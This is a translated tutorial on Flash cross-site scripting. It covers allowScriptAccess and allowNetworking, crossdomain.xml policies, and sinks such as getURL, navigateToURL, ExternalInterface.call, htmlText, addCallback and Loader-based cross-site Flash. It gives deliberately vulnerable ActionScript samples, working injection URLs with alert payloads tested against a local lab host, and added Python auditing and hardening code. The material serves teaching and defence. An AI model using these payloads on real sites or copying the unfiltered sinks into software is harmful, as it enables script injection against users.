Summary of common Flash XSS attack methods (worth collecting)

Source: Internet
Author: User
Tags: addChild, html, page

0x01 Embedding Flash in HTML

Flash is embedded in HTML differently in IE and in non-IE browsers; both the embed tag and the object tag can be used. The following code embeds a SWF:

Embedding under IE:

<object codebase="http://fpdownload.macromedia.com/get/Flashplayer/current/swFlash.cab#version=8,0,0,0" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000">
  <param name="movie" value="http://xxxx.sinaapp.com/trace.swf"/>
  <param name="allowScriptAccess" value="always"/>
  <param name="allowNetworking" value="all"/>
</object>

Embedding under non-IE browsers:

<object type="application/x-shockwave-flash" data="/trace.swf">
  <param name="movie" value="./trace.swf"/>
  <param name="allowScriptAccess" value="always"/>
  <param name="allowNetworking" value="all"/>
</object>

When inserting Flash, two parameters matter: allowScriptAccess and allowNetworking.

allowScriptAccess controls communication between the HTML page and the Flash movie:
  always: HTML/Flash communication is not restricted in any way;
  sameDomain: HTML and Flash may communicate only when they are in the same domain (this is the default value);
  never: HTML/Flash communication is prohibited.
allowNetworking controls communication between Flash and the external network:
  all: all network API interfaces are available;
  internal: navigateToURL, fscommand and ExternalInterface.call are unavailable;
  none: all network APIs are unavailable.

Take Chrome as the example to verify the parameters above. First, in a local environment, create a new Flash file whose main content uses ExternalInterface.call to force-execute a JS statement that pops up the page's domain name.

1) Insert the local Flash file.

<object type="application/x-shockwave-flash" data="/trace.swf">
  <param name="movie" value="./trace.swf"/>
  <param name="allowScriptAccess" value="always"/>
  <param name="allowNetworking" value="all"/>
</object>

Run Result:




2) Insert the local Flash file, changing the allowScriptAccess parameter to sameDomain.

<object type="application/x-shockwave-flash" data="/trace.swf">
  <param name="movie" value="./trace.swf"/>
  <param name="allowScriptAccess" value="sameDomain"/>
  <param name="allowNetworking" value="all"/>
</object>

Run Result:



The HTML page and the Flash file are in the same domain, so the alert still appears.

3) Insert the local Flash file, changing allowScriptAccess to never.

<object type="application/x-shockwave-flash" data="/trace.swf">
  <param name="movie" value="./trace.swf"/>
  <param name="allowScriptAccess" value="never"/>
  <param name="allowNetworking" value="all"/>
</object>

Run result: no alert appears.

4) Insert a remote Flash file, with allowScriptAccess set to always.

<object type="application/x-shockwave-flash" data="http://xxxxx.sinaapp.com/trace.swf">
  <param name="movie" value="http://xxxx.sinaapp.com/trace.swf"/>
  <param name="allowScriptAccess" value="always"/>
  <param name="allowNetworking" value="all"/>
</object>

Run Result:



Note that the domain shown in the alert is the current HTML page's domain name, not the Flash file's domain.

5) Insert a remote Flash file, changing allowScriptAccess to sameDomain.

<object type="application/x-shockwave-flash" data="http://xxxxx.sinaapp.com/trace.swf">
  <param name="movie" value="http://xxxx.sinaapp.com/trace.swf"/>
  <param name="allowScriptAccess" value="sameDomain"/>
  <param name="allowNetworking" value="all"/>
</object>

Run result: no alert, because the Flash file is not in the same domain as the HTML page.

6) Insert a remote Flash file, changing allowScriptAccess to never.

<object type="application/x-shockwave-flash" data="http://xxxxx.sinaapp.com/trace.swf">
  <param name="movie" value="http://xxxxx.sinaapp.com/trace.swf"/>
  <param name="allowScriptAccess" value="never"/>
  <param name="allowNetworking" value="all"/>
</object>

Run result: no alert, because communication with the HTML page is blocked.

7) Set allowScriptAccess to always and allowNetworking to internal.

<object type="application/x-shockwave-flash" data="http://xxxxx.sinaapp.com/trace.swf">
  <param name="movie" value="http://xxxxx.sinaapp.com/trace.swf"/>
  <param name="allowScriptAccess" value="always"/>
  <param name="allowNetworking" value="internal"/>
</object>

Run result: no alert. With allowNetworking set to internal, the ExternalInterface.call interface is forbidden.
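The seven tests above reduce to one decision rule. The following added example (not code from the original article) encodes that rule and uses it to audit the object embeds in a page, reporting which SWFs may run JS in it; the sample HTML and the host 192.168.4.70 are constructed for the demo.

```python
import re
from urllib.parse import urlsplit

# Added example (not from the article): the allowScriptAccess / allowNetworking
# rules verified in the seven tests above as one decision function, plus an
# audit of the <object> embeds in a page that reports which SWFs may run JS.

def script_access_allowed(allow_script_access, allow_networking, same_domain):
    """True if the SWF may call ExternalInterface.call into the hosting page:
    always -> yes; sameDomain (the default) -> only a same-domain SWF;
    never -> no; allowNetworking internal/none disables ExternalInterface."""
    access = (allow_script_access or "sameDomain").lower()
    networking = (allow_networking or "all").lower()
    if networking != "all":
        return False
    if access == "always":
        return True
    if access == "samedomain":
        return same_domain
    return False  # 'never' and unrecognised values
_ATTR = re.compile(r'([A-Za-z_:][-\w:.]*)\s*=\s*"([^"]*)"')
def _attrs(tag_text):
    return {k.lower(): v for k, v in _ATTR.findall(tag_text)}

def audit_embeds(html, page_host):
    """[(swf_url, 'scriptable' | 'blocked'), ...] for each <object> in html.
    The SWF URL comes from the movie param (IE) or the data attribute; a
    relative URL counts as same-domain, as in the local tests above."""
    findings = []
    for block in re.findall(r"<object\b[^>]*>.*?</object>", html, re.I | re.S):
        attrs = _attrs(block.split(">", 1)[0])
        params = {}
        for p in re.findall(r"<param\b[^>]*>", block, re.I):
            pa = _attrs(p)
            if "name" in pa:
                params[pa["name"].lower()] = pa.get("value", "")
        swf = params.get("movie") or attrs.get("data", "")
        host = urlsplit(swf).hostname
        same = host is None or host.lower() == page_host.lower()
        allowed = script_access_allowed(params.get("allowscriptaccess"),
                                        params.get("allownetworking"), same)
        findings.append((swf, "scriptable" if allowed else "blocked"))
    return findings

# Constructed sample page: remote SWF with always/all, local SWF at the default, remote SWF at sameDomain.
SAMPLE_HTML = """
<object type="application/x-shockwave-flash" data="http://xxxxx.sinaapp.com/trace.swf">
  <param name="allowScriptAccess" value="always"/>
  <param name="allowNetworking" value="all"/>
</object>
<object type="application/x-shockwave-flash" data="./trace.swf"></object>
<object type="application/x-shockwave-flash" data="http://xxxxx.sinaapp.com/trace.swf"><param name="allowScriptAccess" value="sameDomain"/></object>
"""
```

Running audit_embeds(SAMPLE_HTML, "192.168.4.70") marks the first two embeds scriptable and the third blocked.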

0x02 Flash cross-domain requests

Flash cross-domain access is governed mainly by the crossdomain.xml file. The file strictly follows XML syntax, and its main role is to decide whether a request made by Flash to a resource of this domain is allowed. For example: a Flash file hosted under www.evil.com makes a cross-domain request to www.q.com; the crossdomain.xml file in the www.q.com root directory is checked first to see whether Flash from the evil.com domain is allowed to request resources of this domain. The crossdomain.xml file consists mainly of the following nodes:

site-control, allow-access-from, allow-access-from-identity, allow-http-request-headers-from

The most commonly used node is allow-access-from (at least in what I have seen), which states which domains' Flash files are allowed to make cross-domain requests for this domain's resources.

For example, here is Youku's crossdomain.xml file:

<cross-domain-policy>
  <allow-access-from domain="*.youku.com"/> <!-- allows Flash from the youku.com domain to access -->
  <allow-access-from domain="*.ykimg.com"/>
  <allow-access-from domain="*.tudou.com"/>
  <allow-access-from domain="*.tudouui.com"/>
  <allow-access-from domain="*.tdimg.com"/>
</cross-domain-policy>

PS: this file is what usually matters in Flash CSRF; when allow-access-from domain is set to *, there may be a risk of Flash CSRF.
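As an added example (not code from the article), the policy check and the over-broad-entry audit a defender would run against a crossdomain.xml: it parses the allow-access-from nodes, decides whether a SWF hosted on a given domain would be allowed in, and flags the wildcard cases. The Youku policy below is a constructed copy of the one quoted above; the subdomain-wildcard semantics are an assumption noted in the code.

```python
import xml.etree.ElementTree as ET

# Added example (not from the article): parses a crossdomain.xml policy, decides
# whether a SWF hosted on a given domain may read this site's resources, and
# flags the over-broad allow-access-from entries that enable Flash CSRF.

def policy_patterns(xml_text):
    """Domain patterns of every allow-access-from node, in document order."""
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain-policy document")
    return [node.get("domain", "") for node in root.iter("allow-access-from")]

def pattern_matches(pattern, requesting_domain):
    """Flash wildcard rules: '*' matches any domain; '*.example.com' matches
    example.com and its subdomains (assumed here, following Adobe's policy-file
    documentation); anything else must match exactly. Case-insensitive."""
    pattern, domain = pattern.lower(), requesting_domain.lower()
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        base = pattern[2:]
        return domain == base or domain.endswith("." + base)
    return domain == pattern

def policy_allows(xml_text, requesting_domain):
    """Would a SWF served from requesting_domain be allowed to read responses?"""
    return any(pattern_matches(p, requesting_domain) for p in policy_patterns(xml_text))

def audit_policy(xml_text):
    """Warnings for entries that let arbitrary sites make credentialed requests."""
    warnings = []
    for p in policy_patterns(xml_text):
        if p == "*":
            warnings.append('domain="*": any SWF on the web can read this site '
                            "with the visitor's cookies (Flash CSRF)")
        elif p.startswith("*.") and "." not in p[2:]:
            warnings.append('domain="%s": every site under that TLD is trusted' % p)
    return warnings

# Constructed copy of the Youku policy quoted above, and an open policy for contrast.
YOUKU_POLICY = """<cross-domain-policy>
  <allow-access-from domain="*.youku.com"/>
  <allow-access-from domain="*.ykimg.com"/>
  <allow-access-from domain="*.tudou.com"/>
  <allow-access-from domain="*.tudouui.com"/>
  <allow-access-from domain="*.tdimg.com"/>
</cross-domain-policy>"""

OPEN_POLICY = """<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>"""
```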

0x03 Summary of common Flash XSS classes

Flash flaw parameter: getURL

Flash provides several functions that can execute JS code: getURL (AS2), navigateToURL (AS3) and ExternalInterface.call. A related instance found on WooYun:

WooYun: Long-time Network Flash security problem analysis and exploitation (i)

Following the principle of learning by building a local practice environment: create a new Flash locally; the Flash loads an external XML resource file. Flash code:

var root_xml:XML = new XML();
root_xml.ignoreWhite = true;
root_xml.onLoad = function(success) {
    if (success) {
        // the text of the first node is passed straight to getURL without filtering
        getURL(root_xml.childNodes[0].childNodes[0].childNodes[0].nodeValue);
    } else {
        getURL("javascript:alert('Fail')");
    }
};
root_xml.load(_root.url);

XML file:

<?xml version="1.0" encoding="utf-8"?>
<data>
    <link>javascript:alert('XSS')</link>
</data>

Run Result:



PS: this type of problem can generally be found by looking at the XML file that the SWF loads; if the incoming content is not filtered, such problems are very likely to occur.

Flash flaw parameter: navigateToURL

In the example above, getURL() is the AS2 method; AS3 uses navigateToURL instead. WooYun has instances where this parameter was reported as causing Flash XSS.

WooYun (wooyun-2012-016512): [Tencent Example Tutorials] We studied XSS together in those years, part 14: Getting started with Flash XSS [navigateToURL]

This kind of problem generally arises because the resource file loaded (such as an XML file) can be controlled by an attacker, resulting in Flash XSS.

Learning by building locally. Flash file:

import flash.net.URLRequest;
import flash.net.URLLoader;
import flash.net.navigateToURL;
import flash.events.Event;

var url:String = stage.loaderInfo.parameters.url;  // externally supplied flashvar
var req:URLRequest = new URLRequest("a.xml");
var ld:URLLoader = new URLLoader();
ld.addEventListener(Event.COMPLETE, ok);
function ok(evtObj:Event):void {
    if (ld.data) {
        // the unfiltered parameter becomes the navigation target
        navigateToURL(new URLRequest(url), "_self");
    }
}
ld.load(req);

Roughly: a parameter is obtained from outside and passed to navigateToURL.

Run Result:



Flash flaw parameter: ExternalInterface.call (parameter one)

ExternalInterface.call is another Flash-provided interface function that can execute JS. It takes two parameters, of the form ExternalInterface.call("functionName", "parameter 1").

The JS code Flash finally executes looks like this:

try { __flash__toXML(functionName("parameter 1")); } catch (e) { "<undefined/>"; }

This section first considers the first parameter, the function name.

The relevant examples on WooYun are:

WooYun: [Tencent Example Tutorials] We studied XSS together in those years, part 15: Flash XSS advanced [ExternalInterface.call first parameter]

WooYun: Flash application security series [1]: 360 reflected XSS

These two articles are written in great detail.

Learning by building locally. Flash file:

var a:String = root.loaderInfo.parameters.func;  // externally supplied flashvar
if (ExternalInterface.available) {
    ExternalInterface.call(a);  // the parameter becomes the JS function name
} else {
    trace("ExternalInterface unavailable");
}
stop();

It gets the parameter func from outside, passes it as the first parameter of ExternalInterface.call, and executes it.

Compare with the template:

try { __flash__toXML(functionName("parameter 1")); } catch (e) { "<undefined/>"; }

Construct a URL:

http://192.168.4.70/ExternalInterface_first.swf?func=alert(1))}catch(e){alert(100)}//

The JS code actually executed is:

try { __flash__toXML(alert(1))}catch(e){alert(100)}//("parameter 1")); } catch (e) { "<undefined/>"; }

For the second URL,

http://192.168.4.70/ExternalInterface_first.swf?func=a1lert(1))}catch(e){alert(100)}//

the JS code actually executed is:

try { __flash__toXML(a1lert(1))}catch(e){alert(100)}//("parameter 1")); } catch (e) { "<undefined/>"; }

The expected result: the first URL pops up 1 (alert(1) runs), and the second URL pops up 100 (a1lert is undefined, the exception falls into the catch block, and alert(100) runs). Access

http://192.168.4.70/ExternalInterface_first.swf?func=alert(1))}catch(e){alert(100)}//



Access

http://192.168.4.70/ExternalInterface_first.swf?func=a1lert(1))}catch(e){alert(100)}//



Both match the expected result.

Flash flaw parameter: ExternalInterface.call (parameter two)

Sometimes when you decompile a SWF you find that the controllable parameter is output into the second parameter of ExternalInterface.call; the method and the mindset are similar to the first-parameter case.

Related examples on WooYun:

WooYun: [Tencent Example Tutorials] We studied XSS together in those years, part 16: Flash XSS advanced [ExternalInterface.call second parameter]

WooYun: Flash application security series [3]: WordPress reflected XSS (0day)

Flash File:

var a:String = root.loaderInfo.parameters.par;  // externally supplied flashvar
if (ExternalInterface.available) {
    ExternalInterface.call("alert", a);  // the parameter lands inside a JS string literal
} else {
    trace("ExternalInterface unavailable");
}
stop();

In the Flash file, a is a parameter obtained from outside: the parameter par is assigned to a and output into the second-parameter position of ExternalInterface.call. This differs from the first parameter in that the output point is inside quotation marks, so here we need to close the quotes. According to the two articles above, the way to close the quotation marks is \" : a bare " would be escaped to \" and be eaten.

Based on the ExternalInterface.call prototype:

try { __flash__toXML(functionName("parameter 1")); } catch (e) { "<undefined/>"; }

we supply the following URL for the parameter:

http://192.168.4.70/ExternalInterface_second.swf?par=1111\%22),al)}catch(e){alert(1000)}//

By analysis, the JS executed should be:

try { __flash__toXML(alert("1111\\"),al)}catch(e){alert(1000)}//")); } catch (e) { "<undefined/>"; }

So two boxes should pop up, one showing 1111\ and one showing 1000. Run result: 1111\ pops up:



Click OK, and 1000 pops up:



PS: here the function name called by ExternalInterface.call was hard-coded as alert when the Flash was written, so it pops up twice. In general the function name cannot be controlled, so we make the preceding function call throw an exception and let the JS in the catch block execute.

Flash flaw parameter: htmlText

Flash supports embedding HTML in Flash, including the img tag, the a tag and so on. The img tag can load a Flash file through its src attribute, similar to XSF.

WooYun: Flash application security series [6]: Sina Weibo worm threat

That document is written in great detail and is recommended reading. Learning by building locally, create a Flash file:

import fl.controls.TextArea;

var a:String = root.loaderInfo.parameters.url;  // externally supplied flashvar
var t:TextArea = new TextArea();
t.width = 400;   // the size values did not survive in this copy; any size will do
t.height = 300;
t.htmlText = a;  // external input rendered as HTML without filtering
addChild(t);

The parameter url is read from the URL and assigned to a, and a is output directly into the TextArea t. Access the following URL:

http://192.168.4.70/htmltext.swf?url=%3Cimg%20src=%27./trace.swf%27%3E

The result of the visit is as follows:



PS: when you decompile a Flash file and find an htmlText output point, check whether a related input is controllable; if so, there may be XSS.

Flash flaw parameter: object id

The object id can be controlled when HTML communicates with the SWF through the ExternalInterface.addCallback function, which is invoked as follows:

function a():void { trace("hi"); }
ExternalInterface.addCallback("test", a);

After this executes, function a in Flash can be invoked from the HTML page under the name test.

The principle of addCallback (decompiled player code):

if (((ActiveX == true)) && (!((objectID == null)))) {
    _evalJS(((("__flash__addCallback(document.getElementById(\"" + objectID) + "\"), \"") + functionName) + "\")");
};

objectID is the id of the Flash object and functionName is the function name, so when the id of the Flash object we insert is controllable, there may be an XSS problem.
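The two JavaScript templates quoted above, the one behind ExternalInterface.call (first and second parameter) and the one behind addCallback, share the same defect: a value is spliced into JS source without being kept inside its identifier or string context. This added example (not code from the article or from the player; function names are mine) reproduces both templates with the quote-only escaping described above, beside a hardened renderer that validates identifiers and JSON-encodes strings.

```python
import json
import re

# Added example (not from the article): the two JavaScript templates quoted
# above, for ExternalInterface.call and for addCallback, rendered the way the
# old player did it, beside a hardened renderer that keeps each value inside
# its JS identifier or string context. Function and variable names are mine.

JS_IDENT = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")

def is_safe_js_identifier(name):
    """True only for a plain or dotted identifier such as 'alert' or 'app.ready'."""
    return bool(JS_IDENT.match(name))

def flash_escape_old(value):
    """Quote-only escaping: a double quote becomes backslash-quote, but a backslash
    passes through, so backslash-quote becomes backslash-backslash-quote and the
    string literal ends early (the behaviour the article relies on)."""
    return value.replace('"', '\\"')

def render_call_old(func_name, arg):
    """JS built for ExternalInterface.call(func_name, arg) by the template
    try { __flash__toXML(func("arg")); } catch (e) { "<undefined/>"; }"""
    return ('try { __flash__toXML(%s("%s")); } catch (e) { "<undefined/>"; }'
            % (func_name, flash_escape_old(arg)))

def render_addcallback_old(object_id, function_name):
    """JS built by addCallback; the object id is dropped in unescaped."""
    return ('__flash__addCallback(document.getElementById("%s"), "%s")'
            % (object_id, function_name))

def render_call_safe(func_name, arg):
    """Hardened: the name must be an identifier; the argument is JSON-encoded,
    which escapes quotes and backslashes, so no input can leave the string."""
    if not is_safe_js_identifier(func_name):
        raise ValueError("not a JS identifier: %r" % func_name)
    return ('try { __flash__toXML(%s(%s)); } catch (e) { "<undefined/>"; }'
            % (func_name, json.dumps(arg)))

def render_addcallback_safe(object_id, function_name):
    """Hardened addCallback: id and name are both JSON-encoded string literals."""
    if not is_safe_js_identifier(function_name):
        raise ValueError("not a JS identifier: %r" % function_name)
    return ('__flash__addCallback(document.getElementById(%s), %s)'
            % (json.dumps(object_id), json.dumps(function_name)))
```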

Similar problems that have appeared on WooYun:

WooYun: [Tencent Example Tutorials] We studied XSS together in those years, part 21: Stored XSS advanced [guessing rules, using Flash addCallback to construct XSS]

WooYun: Flash application security series [4]: another Flash Player 0day

WooYun: QQ Space functional defect causes log stored XSS-12

Learning by building locally, create a Flash file:

function a():void { trace("hi"); }
ExternalInterface.addCallback("test", a);

x.html page:

<object id="addcallback,&quot;(function(){if(!window.x){window.x=1;alert(1)}})()(&quot;" codebase="http://fpdownload.macromedia.com/get/Flashplayer/current/swFlash.cab#version=8,0,0,0" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000">
  <param name="movie" value="/addcallback.swf"/>
  <param name="allowScriptAccess" value="always"/>
  <param name="allowNetworking" value="all"/>
</object>

Access the page (tested in IE8):



Flash flaw parameter: addCallback combined with LSO

The problem point is the function declared in addCallback: its return value flows into the JS of the HTML page and is controllable, resulting in an XSS problem. Using LSO, first call setLso to write dirty data, then call getLso to read the dirty data back.


Related information from Drops:

A large-scale and stealthy Taobao/Alipay account and password theft vulnerability (with a video demo of the mine attack)

Learning by building locally, create a Flash file:

function setLso(_arg1:String):Boolean {
    var _local2:SharedObject = SharedObject.getLocal("kj");
    _local2.data.key = _arg1;  // whatever the page's JS passes in is stored unchecked
    _local2.flush();
    return true;
}
function getLso():String {
    var _local1:SharedObject = SharedObject.getLocal("kj");
    if (_local1.data.key == undefined) {
        return "";
    }
    return _local1.data.key;  // and handed back to the page's JS as-is
}
ExternalInterface.addCallback("getLso", getLso);
ExternalInterface.addCallback("setLso", setLso);

x.html:


Run Result:



Cross-site Flash (XSF)

Cross-site Flash is XSF: a third-party Flash file is loaded through AS, and if that third-party Flash can be controlled, XSF can be achieved. In AS2, third-party Flash is loaded with the loadMovie function and similar:

_root.loadMovie(swf);

In AS3 the Loader class handles external data:

var param:Object = root.loaderInfo.parameters;
var swf:String = param["swf"];
var myLoader:Loader = new Loader();
var url:URLRequest = new URLRequest(swf);
myLoader.load(url);
addChild(myLoader);

Build the local environment; new Flash:

var param:Object = root.loaderInfo.parameters;
var swf:String = param["swf"];  // externally supplied flashvar, loaded without any check
var myLoader:Loader = new Loader();
var url:URLRequest = new URLRequest(swf);
myLoader.load(url);
addChild(myLoader);

New local HTML file:

<object id="LSO" type="application/x-shockwave-flash" data="http://192.168.4.70/xsf.swf">
  <param name="movie" value="http://192.168.4.70/xsf.swf"/>
  <param name="allowScriptAccess" value="always"/>
  <param name="allowNetworking" value="all"/>
  <param name="flashvars" value="swf=http://xxxxx.sinaapp.com/trace.swf"/>
</object>

Run result: loading the remote defective SWF file results in XSF.
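The missing piece in the XSF demo above is any check on the swf flashvar before Loader.load(). As an added example (not code from the article), this is the check a SWF, or the server generating its flashvars, should apply: resolve the value against the hosting SWF's own URL and refuse anything that is not http(s) on an allow-listed host. The allow-list host 192.168.4.70 and the sample inputs are constructed for the demo.

```python
from urllib.parse import urljoin, urlsplit

# Added example (not from the article): the check that should sit between an
# externally supplied flashvar such as swf=... and Loader.load(), so the hosting
# SWF only ever loads movies from its own host or an explicit allow-list.

ALLOWED_HOSTS = {"192.168.4.70"}  # hypothetical: the host serving xsf.swf above
HOSTING_SWF_URL = "http://192.168.4.70/xsf.swf"  # constructed base URL for the demo

def resolve_swf_url(base_url, swf_param, allowed_hosts=ALLOWED_HOSTS):
    """Absolute URL that is safe to load, or None when it must be refused."""
    if not swf_param or swf_param != swf_param.strip():
        return None
    absolute = urljoin(base_url, swf_param)        # relative paths resolve against the SWF's own URL
    parts = urlsplit(absolute)
    if parts.scheme not in ("http", "https"):      # javascript:, data:, file: and friends
        return None
    if parts.username is not None or parts.hostname is None:   # 'host@evil' tricks, malformed URLs
        return None
    if parts.hostname.lower() not in allowed_hosts:            # the remote trace.swf case above
        return None
    return absolute
```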


